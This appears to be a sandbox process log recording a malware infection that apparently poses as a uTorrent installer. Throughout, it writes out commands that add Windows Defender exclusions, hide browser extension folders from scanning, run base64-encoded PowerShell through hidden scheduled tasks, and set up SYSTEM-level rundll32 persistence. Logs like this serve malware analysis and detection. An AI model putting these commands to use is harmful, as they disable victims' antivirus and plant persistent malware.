"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147914824 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147914824 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NOWTtjuGDiydC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NOWTtjuGDiydC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OMeOFycTU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OMeOFycTU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RnBNRnIwUzVU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RnBNRnIwUzVU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kmKpunNFSNUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kmKpunNFSNUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\TtvXSoLtbVXOCJVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\TtvXSoLtbVXOCJVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VBkUndoRUYbskVcRK\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VBkUndoRUYbskVcRK\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rLJCaCpfIrfYjdgZ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rLJCaCpfIrfYjdgZ\" /t REG_DWORD /d 0 /reg:64;"

C:\ProgramData\uTorrent\utorrent9.exe

"C:\ProgramData\uTorrent\utorrent9.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\is-5SD8N.tmp\utorrent9.tmp

"C:\Users\Admin\AppData\Local\Temp\is-5SD8N.tmp\utorrent9.tmp" /SL5="$3071E,832512,832512,C:\ProgramData\uTorrent\utorrent9.exe" /VERYSILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NOWTtjuGDiydC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NOWTtjuGDiydC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NOWTtjuGDiydC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OMeOFycTU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OMeOFycTU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RnBNRnIwUzVU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RnBNRnIwUzVU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kmKpunNFSNUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kmKpunNFSNUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\TtvXSoLtbVXOCJVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\TtvXSoLtbVXOCJVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VBkUndoRUYbskVcRK /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VBkUndoRUYbskVcRK /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rLJCaCpfIrfYjdgZ /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rLJCaCpfIrfYjdgZ /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "grwmUrXfT" /SC once /ST 01:21:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "grwmUrXfT"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2836 --field-trial-handle=2840,i,2085854678075431589,1333001626228034042,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2996 --field-trial-handle=2840,i,2085854678075431589,1333001626228034042,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3000 --field-trial-handle=2840,i,2085854678075431589,1333001626228034042,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3148 --field-trial-handle=2840,i,2085854678075431589,1333001626228034042,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3156 --field-trial-handle=2840,i,2085854678075431589,1333001626228034042,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4248 --field-trial-handle=2840,i,2085854678075431589,1333001626228034042,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "grwmUrXfT"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "coQLnzjOCQIuUMNyn" /SC once /ST 00:20:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe\" Tp /CXZedidGJ 757674 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "coQLnzjOCQIuUMNyn"

C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe

C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe Tp /CXZedidGJ 757674 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5404 -ip 5404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5404 -s 820

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bhzAbyJhiYArNEwhRY"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\OMeOFycTU\znOYOp.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "VGggbamSlsorNxx" /V1 /F

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "VGggbamSlsorNxx2" /F /xml "C:\Program Files (x86)\OMeOFycTU\jJabmpg.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "VGggbamSlsorNxx"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "VGggbamSlsorNxx"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "sWuJIXBYaMGWKZ" /F /xml "C:\Program Files (x86)\RnBNRnIwUzVU2\TrizmLz.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "NNeqJVkrzmhrs2" /F /xml "C:\ProgramData\TtvXSoLtbVXOCJVB\AALhHIl.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "KHgAEdrkAvYTaiAFk2" /F /xml "C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR\fUiCNqd.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bvOgMXzRBPtqAKitkiY2" /F /xml "C:\Program Files (x86)\NOWTtjuGDiydC\dgUUnMX.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "kWTyeDFhQZoEtpUUx" /SC once /ST 01:12:47 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\rLJCaCpfIrfYjdgZ\qLESPtTx\mfPudDb.dll\",#1 /jddidvrXq 757674" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "kWTyeDFhQZoEtpUUx"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2404 -ip 2404

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\rLJCaCpfIrfYjdgZ\qLESPtTx\mfPudDb.dll",#1 /jddidvrXq 757674

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\rLJCaCpfIrfYjdgZ\qLESPtTx\mfPudDb.dll",#1 /jddidvrXq 757674

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2036

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2116

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "nAKwq1" /SC once /ST 01:15:47 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "nAKwq1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2404 -ip 2404

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "kWTyeDFhQZoEtpUUx"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2032

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1884 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2992 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2844 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5400 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1980 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "nAKwq1"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "coQLnzjOCQIuUMNyn"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 6272 -ip 6272

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6272 -s 828

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6356 -ip 6356

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6356 -s 2328

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6112 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

